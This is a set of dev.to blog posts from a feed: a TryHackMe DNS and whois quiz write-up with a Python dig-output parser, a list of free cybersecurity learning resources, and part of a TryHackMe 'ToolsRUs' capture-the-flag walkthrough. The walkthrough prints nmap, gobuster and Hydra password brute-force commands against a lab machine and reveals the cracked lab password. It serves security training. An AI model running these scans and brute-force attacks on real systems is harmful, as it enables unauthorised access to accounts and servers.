&lt;li&gt;&lt;strong&gt;[OSINT] What is the name of the golf course that is near the registrant address for &lt;a href="http://microsoft.com/" rel="noopener noreferrer"&gt;microsoft.com&lt;/a&gt;?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To start this OSINT procedure, we need to know Microsoft's registrant address. By analyzing the information retrieved from our &lt;code&gt;whois&lt;/code&gt; search, we can see the address is One Microsoft Way, Redmond, WA 98052. Typing it into Google Maps and zooming out a bit, we can see that Microsoft's headquarters are quite close to the &lt;strong&gt;Bellevue Golf Course&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbre65tgcigbxhrneqsch.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbre65tgcigbxhrneqsch.png" alt="OSINT Golf Course"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What is the registered Tech Email for &lt;a href="http://microsoft.com/" rel="noopener noreferrer"&gt;microsoft.com&lt;/a&gt;?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8xm1ivj8n7jrtgkb2fph.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8xm1ivj8n7jrtgkb2fph.png" alt="Tech E-mail"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Networking Tools - Dig
&lt;/h1&gt;

&lt;p&gt;Dig, a fantastic tool for troubleshooting networks, can provide a lot of information about the DNS servers related to a domain. &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What is DNS short for?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;DNS stands for &lt;strong&gt;Domain Name System,&lt;/strong&gt; which maps a human-readable name to an IP address.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What is the first type of DNS server your computer would query when you search for a domain?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Recursive.&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What type of DNS server contains records specific to domain extensions (i.e. .com, .co.uk, etc.)? Use the long version of the name.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the &lt;strong&gt;Top-Level Domain&lt;/strong&gt; server. The TLD is the part of the domain name that comes after the last dot, and TLDs are divided into two categories: gTLDs (generic top-level domains) and ccTLDs (country-code top-level domains).&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Where is the very first place your computer would look to find the IP address of a domain?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Local Cache&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;[Research] Google runs two public DNS servers. One of them can be queried with the IP 8.8.8.8, what is the IP address of the other one?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj8y5pzijfprne5rb8dxg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj8y5pzijfprne5rb8dxg.png" alt="Google DNS Server"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;If a DNS query has a TTL of 24 hours, what number would the dig query show?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Since dig shows TTL values in seconds, we simply compute 60 * 60 * 24 (the number of seconds in a day) to get &lt;strong&gt;86400&lt;/strong&gt;.&lt;/p&gt;
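&lt;p&gt;As an added example (my own Python, not code from the original post), the script below parses the ANSWER SECTION of dig output, renders the seconds-based TTL column in a readable form, and uses it to drive a small local cache of the kind a resolver checks before asking any DNS server. The dig output is constructed inline; its TTLs and 192.0.2.x addresses are made-up values.&lt;/p&gt;

```python
"""Parse the ANSWER SECTION of dig output and use its TTL column, which dig
prints in seconds (so a 24-hour TTL shows as 86400), to drive the local cache
that a resolver consults before querying any DNS server."""
from datetime import datetime, timedelta, timezone

# Constructed dig output, not a real query result: the addresses come from the
# 192.0.2.0/24 documentation range and the TTL values are made up.
SAMPLE_DIG_OUTPUT = """\
; constructed dig output for example.com
;; QUESTION SECTION:
;example.com.\t\t\tIN\tA

;; ANSWER SECTION:
example.com.\t\t86400\tIN\tA\t192.0.2.10
example.com.\t\t300\tIN\tA\t192.0.2.11
www.example.com.\t3600\tIN\tCNAME\texample.com.

;; Query time: 12 msec
"""


def parse_answer_section(text):
    """Return the resource records listed under ';; ANSWER SECTION:'."""
    records = []
    in_answer = False
    for line in text.splitlines():
        if line.startswith(";; ANSWER SECTION:"):
            in_answer = True
            continue
        if not in_answer:
            continue
        if not line.strip():
            break                                  # blank line ends the section
        fields = line.split()                      # name TTL class type rdata...
        if len(fields) in range(5):
            raise ValueError(f"unexpected answer line: {line!r}")
        records.append({"name": fields[0], "ttl": int(fields[1]),
                        "class": fields[2], "type": fields[3],
                        "data": " ".join(fields[4:])})
    return records


def ttl_to_text(ttl):
    """Render a TTL in seconds the way a human reads it: 86400 is '1d'."""
    parts = []
    for unit, size in (("d", 86400), ("h", 3600), ("m", 60)):
        if ttl // size:
            parts.append(f"{ttl // size}{unit}")
            ttl %= size
    if ttl or not parts:
        parts.append(f"{ttl}s")
    return "".join(parts)


def seconds_left(expiry, now):
    """Whole seconds until a cached answer expires, floored at zero."""
    return max(0, int((expiry - now).total_seconds()))


class LocalCache:
    """The first place a lookup goes: an answer is served until its TTL has
    elapsed since it was fetched, after which the recursive resolver is asked."""

    def __init__(self):
        self._entries = {}   # maps (name, type) to (list of rdata, expiry)

    def store(self, records, fetched_at):
        grouped = {}
        for rec in records:
            grouped.setdefault((rec["name"], rec["type"]), []).append(rec)
        for key, group in grouped.items():
            # an RRset is cached as a unit; keep its smallest TTL so that no
            # member is served beyond its own lifetime
            ttl = min(rec["ttl"] for rec in group)
            self._entries[key] = ([rec["data"] for rec in group],
                                  fetched_at + timedelta(seconds=ttl))

    def lookup(self, name, rr_type, now):
        """Cached rdata list, or None when absent or expired."""
        entry = self._entries.get((name, rr_type))
        if entry is None:
            return None
        data, expiry = entry
        if seconds_left(expiry, now) == 0:
            del self._entries[(name, rr_type)]     # stale: must be re-fetched
            return None
        return data


def answer_after(text, offset_seconds, name, rr_type):
    """Fetch at a fixed (constructed) instant, then ask the local cache
    offset_seconds later; None means the TTL has run out."""
    fetched_at = datetime(2024, 1, 1, tzinfo=timezone.utc)
    cache = LocalCache()
    cache.store(parse_answer_section(text), fetched_at)
    return cache.lookup(name, rr_type, fetched_at + timedelta(seconds=offset_seconds))


if __name__ == "__main__":
    for rec in parse_answer_section(SAMPLE_DIG_OUTPUT):
        print(f"{rec['name']:20} {rec['type']:6} TTL {rec['ttl']:6d} ({ttl_to_text(rec['ttl'])})")
```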




&lt;h2&gt;
  
  
  Bibliography
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.lifewire.com/what-is-computer-networking-816249" rel="noopener noreferrer"&gt;https://www.lifewire.com/what-is-computer-networking-816249&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.networkworld.com/article/3239677/the-osi-model-explained-and-how-to-easily-remember-its-7-layers.html" rel="noopener noreferrer"&gt;https://www.networkworld.com/article/3239677/the-osi-model-explained-and-how-to-easily-remember-its-7-layers.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.extrahop.com/company/blog/2019/the-osi-model-explained/" rel="noopener noreferrer"&gt;https://www.extrahop.com/company/blog/2019/the-osi-model-explained/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://tryhackme.com/room/introtonetworking" rel="noopener noreferrer"&gt;https://tryhackme.com/room/introtonetworking&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://afteracademy.com/blog/what-is-data-encapsulation-and-de-encapsulation-in-networking" rel="noopener noreferrer"&gt;https://afteracademy.com/blog/what-is-data-encapsulation-and-de-encapsulation-in-networking&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.oracle.com/cd/E19620-01/805-4041/6j3r8iu2f/index.html" rel="noopener noreferrer"&gt;https://docs.oracle.com/cd/E19620-01/805-4041/6j3r8iu2f/index.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.pearsonitcertification.com/articles/article.aspx?p=398088&amp;amp;seqNum=14" rel="noopener noreferrer"&gt;https://www.pearsonitcertification.com/articles/article.aspx?p=398088&amp;amp;seqNum=14&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.steves-internet-guide.com/dns-guide-beginners/" rel="noopener noreferrer"&gt;http://www.steves-internet-guide.com/dns-guide-beginners/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://help.one.com/hc/en-us/articles/115005587509-What-is-a-top-level-domain-" rel="noopener noreferrer"&gt;https://help.one.com/hc/en-us/articles/115005587509-What-is-a-top-level-domain-&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/speed/public-dns/docs/using" rel="noopener noreferrer"&gt;https://developers.google.com/speed/public-dns/docs/using&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>cybersecurity</category>
      <category>beginners</category>
    </item>
    <item>
      <title>Resources to get you started in Cybersecurity (for free).</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Mon, 22 Feb 2021 15:28:19 +0000</pubDate>
      <link>https://dev.to/arturserra/resources-to-get-you-started-in-cybersecurity-for-free-327o</link>
      <guid>https://dev.to/arturserra/resources-to-get-you-started-in-cybersecurity-for-free-327o</guid>
      <description>&lt;h3&gt;
  
  
  Cybersecurity &lt;strong&gt;is&lt;/strong&gt; an overwhelming subject. There are hundreds of paths one can take in order to get to one of the various jobs in the area. Pentester, DevSecOps Engineer and Blue Team Specialist are just some of the titles in the Cybersecurity microcosmos, and sometimes it can be really difficult to find the right way in. This post isn't supposed to lay down the Ultimate Truth about CyberSec, but rather to reflect on my experience breaking through the first waves of this really gigantic ocean, and maybe serve as one of many guidelines a prospective professional in this field should research and consider before making their own choices.
&lt;/h3&gt;

&lt;p&gt;First, let's take a look at the technical, or hard, skills. These are the techniques and knowledge you have to learn to stand out in most situations. I like to think that one should always be prepared for the opportunities that might appear, and getting proper knowledge and certifications in these three particular subjects is how you are going to build a strong foundation in Cybersecurity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa3ms4hp56o3bcviezuw5.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa3ms4hp56o3bcviezuw5.jpeg" alt="Linux, Network and Offensive Security"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But something important to note is that hard skills can be learned at any time. Better than that, it's really good to develop your own soft skills! These are not as common in the regular script kid, but they are outstandingly necessary nevertheless. So it's good to learn how to clearly communicate your ideas, how to deal with and lead people, and how to be ready to develop and evolve every day.&lt;/p&gt;

&lt;h3&gt;
  
  
  Okay, but how do I get started with all of this?
&lt;/h3&gt;

&lt;p&gt;Right, right. Without further ado, let's jump into practical stuff here.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Over The Wire&lt;/strong&gt;. This cyber wargame is the perfect starting point to get your feet wet and get the gist of the cybersecurity environment. Their most basic room, Bandit, is what you need to get some hands-on experience. And even though one of the most important skills a cybersecurity professional (or any professional, to be honest) can have is Googling your way around any trouble, I'll also add one of the many fantastic resources provided by John Hammond &lt;a href="https://www.youtube.com/watch?v=PRAjBlys-7g&amp;amp;list=PL1H1sBF1VAKUsYdQd94dO9MgSaY2p1AJ4" rel="noopener noreferrer"&gt;&lt;strong&gt;here&lt;/strong&gt;&lt;/a&gt;, where he explains everything you need to know in a really well-crafted walkthrough.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Linux System Administration&lt;/strong&gt;. Knowing your way around Linux is an awesome way to troubleshoot problems in servers and cloud computing services, since most of them are Linux based. It's also good for leveraging information while attacking a machine in a penetration test assessment. So going through this complete course on the &lt;a href="https://www.youtube.com/watch?v=wsh64rjnRas" rel="noopener noreferrer"&gt;&lt;strong&gt;Geek's Lesson Youtube Channel&lt;/strong&gt;&lt;/a&gt; is a nice way to start understanding how Linux works.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Offensive Security&lt;/strong&gt;. Knowing how to run (or build) a network mapping tool, as well as understanding how to gather information and exploit a vulnerability you found, are a must in a Cybersecurity technical role. Even if you're not aligned with the Red Team premises in your company, you had better understand how the adversaries work, in order to better prepare your defenses or to better design and develop your applications before releasing them into production. For that, this &lt;a href="https://www.youtube.com/watch?v=3Kq1MIfTWCE" rel="noopener noreferrer"&gt;&lt;strong&gt;complete course&lt;/strong&gt;&lt;/a&gt; from Heath Adams is all you need to get a practical way around hacking situations.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;INE Cybersecurity Learning Paths&lt;/strong&gt;. After acquiring the rights to be the official training platform for eLearnSecurity's courses, &lt;a href="https://my.ine.com/" rel="noopener noreferrer"&gt;&lt;strong&gt;INE&lt;/strong&gt;&lt;/a&gt; became a mandatory stop for a prospective cybersecurity professional. PTS (Penetration Testing Student, one of their learning paths) is the official course for one of the most prestigious entry-level penetration test certificates out there, the &lt;strong&gt;eJPT&lt;/strong&gt;. And the best thing is: it's free, meaning you only have to pay (as of now) $200 for the exam voucher, while all the learning costs absolutely nothing! That's a really good deal for beginners, and considering how important certifications are in this field, no matter what career path you take, this is also an awesome kickstart for you!&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Some additional resources.
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;FreeCodeCamp&lt;/strong&gt;. With a free 300-hour curriculum focused on Cybersecurity (and other 300-hour curricula for various different subjects as well), FreeCodeCamp can provide extra material for you to start developing your own tools and applying some processes to better secure networks and applications.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;GitHub&lt;/strong&gt;. GitHub is well-known as a code repository and a geek paradise, but you can also find hundreds of repos with new tools, techniques and more resources to keep developing your career and learning more every day. Some of my favorite Cybersecurity-related GitHub repos are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/fabionoth/awesome-cyber-security" rel="noopener noreferrer"&gt;https://github.com/fabionoth/awesome-cyber-security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/EONRaider/blackhat-python3" rel="noopener noreferrer"&gt;https://github.com/EONRaider/blackhat-python3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/sbilly/awesome-security" rel="noopener noreferrer"&gt;https://github.com/sbilly/awesome-security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/harisqazi1/Cybersecurity" rel="noopener noreferrer"&gt;https://github.com/harisqazi1/Cybersecurity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/swisskyrepo/PayloadsAllTheThings" rel="noopener noreferrer"&gt;https://github.com/swisskyrepo/PayloadsAllTheThings&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/DavidLapadula/Python-automate-cybersecurity" rel="noopener noreferrer"&gt;https://github.com/DavidLapadula/Python-automate-cybersecurity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/enaqx/awesome-pentest" rel="noopener noreferrer"&gt;https://github.com/enaqx/awesome-pentest&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;TryHackMe&lt;/strong&gt;. In my humble opinion, the best learning resource for beginners. Just sign up &lt;a href="https://tryhackme.com/" rel="noopener noreferrer"&gt;&lt;strong&gt;there&lt;/strong&gt;&lt;/a&gt;, search for rooms and start hacking. Learn a lot from them, and if you want a better perspective on what you're learning, you can subscribe to their platform and follow some learning paths, focused on both Offensive and Defensive techniques and situations.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Bug Bounty Hunting&lt;/strong&gt;. Once you have your basics down, it's time to put them into practice. But before you get a job, you can legally hack into companies that have a Bug Bounty Program. The path to finding a bug is not easy, but you shouldn't go there for the financial reward alone. Take it as a learning experience, where you can probably find some bugs and earn some money in the process. This way you're going to practice your skills on real-world applications, and get a better glimpse of how things are done in the wild. For that, you can register on a bug bounty platform of your choice (like HackerOne or Intigriti), sign up to a program that you find interesting and start hacking! To help you in this journey, I can't recommend Katie from InsiderPhD enough, and her &lt;a href="https://www.youtube.com/watch?v=_y-iz3itch0" rel="noopener noreferrer"&gt;&lt;strong&gt;videos&lt;/strong&gt;&lt;/a&gt; must be among the best resources for beginners out there.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgthu7w3qmhb8a1uguuh4.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgthu7w3qmhb8a1uguuh4.jpeg" alt="Suggested Cybersecurity Learning Path"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>python</category>
      <category>beginners</category>
      <category>bash</category>
    </item>
    <item>
      <title>TryHackMe - ToolsRUs WriteUp</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Thu, 04 Feb 2021 15:25:19 +0000</pubDate>
      <link>https://dev.to/arturserra/tryhackme-toolsrus-writeup-10da</link>
      <guid>https://dev.to/arturserra/tryhackme-toolsrus-writeup-10da</guid>
      <description>&lt;p&gt;"&lt;em&gt;Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;This task requires you to use the following tools:&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Dirbuster&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Hydra&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Nmap&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Nikto&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Metasploit&lt;/em&gt;"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The objectives of this TryHackMe room are explicit from the very beginning: we need to learn how to use some of the core tools in the current hacking toolkit, which are essential for pushing our methodology forward in an easy, (usually) fast and automated way. So let's start checking this room out and see if we can cover all the tasks and answer all the questions proposed here.&lt;/p&gt;

&lt;p&gt;To start our Information Gathering phase, we run RustScan with &lt;code&gt;docker run -it --rm --name rustscan rustscan/rustscan:1.1.0 10.10.64.71&lt;/code&gt; in order to quickly find out more information about the open ports.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fp5k6ow5jvkn6c7vwr2ja.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fp5k6ow5jvkn6c7vwr2ja.png" alt="RustScan"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once we know which ports are open, we run a really intense nmap focusing only on those ports, with the command &lt;code&gt;nmap -T4 -A -Pn -O -v -p 22,1234,80 10.10.64.71&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fgyj5zeyr9nfwkkq5pf71.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fgyj5zeyr9nfwkkq5pf71.png" alt="Nmap Scan"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The scan gives us a lot of important information, especially that the machine is running two web services, one on port 80 and another one on port 1234.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F73a59q96lm6g05lmbkkr.png" alt="Port 80 Open"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fwuiper6ldqaaf0hw76g8.png" alt="Port 1234 Open"&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Since the one running on port 1234 seems to be just the default page from Apache Tomcat, let's focus on getting some more information on the "main" web service, the one running on port 80.&lt;/p&gt;

&lt;p&gt;To start up our investigation, let's focus on the hero image on the page. It indicates that, even though the main page is down, there might be some secret directories. A common practice is to check the &lt;strong&gt;robots.txt&lt;/strong&gt; file in order to find some hidden gems in a website.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fyzbt1ohceee36qbga0pc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fyzbt1ohceee36qbga0pc.png" alt="Not Functional landing page"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;However, accessing /robots.txt returns a default 404 page. Not an optimal result, but default 404 pages are a good way to disclose what kind of web server (and which version) the application is running on. &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fq870ba9kkmtovnxhmil1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fq870ba9kkmtovnxhmil1.png" alt="Default Apache 404"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We then run a gobuster with the command&lt;br&gt;
&lt;code&gt;gobuster dir -u http://10.10.64.71/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40 -x .php,.txt,.bak,.html 2&amp;gt;/dev/null&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This will not only look for directories in our wordlist, but also for files with extra extensions such as &lt;strong&gt;php&lt;/strong&gt;, &lt;strong&gt;txt&lt;/strong&gt;, &lt;strong&gt;bak&lt;/strong&gt; and &lt;strong&gt;html&lt;/strong&gt;. This is important to find hidden login screens, backup files, development files and other kinds of important information we can gather in this process, which is crucial to expand our attack surface.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fyraycpmjizjsq2edapw8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fyraycpmjizjsq2edapw8.png" alt="Gobuster Scan"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our gobuster scan returns some hidden directories, including the answer for the first question in this room: &lt;/p&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;guidelines&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Accessing /guidelines, we get a message, a "developer leftover". &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fg8n5fvccfzgmn2ryx8t4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fg8n5fvccfzgmn2ryx8t4.png" alt="Developer Leftover"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Whose name can you find from this directory?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;bob&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;That's some valuable information; we might come back to it later. &lt;br&gt;
Moving on with our discovery, we also find this other &lt;strong&gt;protected&lt;/strong&gt; directory.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fxncxh7ouvuanxhmg3b0i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fxncxh7ouvuanxhmg3b0i.png" alt="Protected Directory"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This directory, protected by basic authentication, is also the answer to the next question:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;What directory has basic authentication?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;protected&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;We know one of the developers is called "bob", so this is probably also a username. To find out their password, we can run &lt;strong&gt;Hydra&lt;/strong&gt; with the command:&lt;br&gt;
&lt;code&gt;hydra -l bob -P /usr/share/wordlists/rockyou.txt -t 1 -f 10.10.64.71 http-get /protected/&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;After just a few seconds, we get a matching result, and with it the answer to the fourth question in our room.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;What is bob's password to the protected part of the website?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;bubbles&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

